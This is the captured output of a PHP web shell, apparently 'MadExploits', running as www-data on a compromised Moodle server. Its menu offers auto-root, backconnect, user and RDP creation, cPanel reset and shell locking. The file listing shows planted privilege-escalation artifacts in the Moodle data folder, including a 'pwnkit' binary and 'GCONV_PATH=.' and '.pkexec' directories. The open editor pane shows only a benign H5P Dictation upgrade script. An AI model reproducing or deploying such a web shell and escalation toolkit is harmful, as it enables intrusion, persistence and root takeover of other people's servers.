Linux moodl-moodle-3s8bw1nuh5yqd9-5b875fdd66-8hs4m 4.4.0-186-generic #216-Ubuntu SMP Wed Jul 1 05:34:05 UTC 2020 x86_64
Apache/2.4.41 (Ubuntu)
: 10.39.0.36 | : 10.36.0.0
Cant Read [ /etc/named.conf ]
7.4.3
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
moodledata /
filedir /
bb /
0a /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-sr-x
GCONV_PATH=.
[ DIR ]
drwxr-sr-x
.mad-root
0
B
-rw-r--r--
bb0a758ced75d33e47e7b5fa304c19...
1.91
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : bb0a758ced75d33e47e7b5fa304c197003d1e552
var H5PUpgrades = H5PUpgrades || {}; H5PUpgrades['H5P.Dictation'] = (function () { return { 1: { /** * Asynchronous content upgrade hook. * * Move parameters in Behavioural Settings. * Correct use of enableSolution => enableSolutionsButton * * @param {Object} parameters * @param {function} finished */ 1: function (parameters, finished, extras) { if (parameters && parameters.behaviour) { const behaviour = parameters.behaviour; behaviour.scoring = { ignorePunctuation: (typeof behaviour.ignorePunctuation === 'boolean') ? behaviour.ignorePunctuation : true, zeroMistakeMode: (typeof behaviour.zeroMistakeMode === 'boolean') ? behaviour.zeroMistakeMode : false, typoFactor: behaviour.typoFactor || '100' }; behaviour.textual = { wordSeparator: behaviour.wordSeparator || ' ', overrideRTL: behaviour.overrideRTL || 'auto', autosplit: (typeof behaviour.autosplit === 'boolean') ? behaviour.autosplit : true }; behaviour.feedbackPresentation = { customTypoDisplay: (typeof behaviour.customTypoDisplay === 'boolean') ? behaviour.customTypoDisplay : false, alternateSolution: behaviour.alternateSolution || 'first' }; behaviour.enableSolutionsButton = (typeof behaviour.enableSolution === 'boolean') ? behaviour.enableSolution : true; delete behaviour.ignorePunctuation; delete behaviour.zeroMistakeMode; delete behaviour.typoFactor; delete behaviour.wordSeparator; delete behaviour.overrideRTL; delete behaviour.autosplit; delete behaviour.customTypoDisplay; delete behaviour.alternateSolution; delete behaviour.enableSolution; } finished(null, parameters, extras); } } }; })();
Close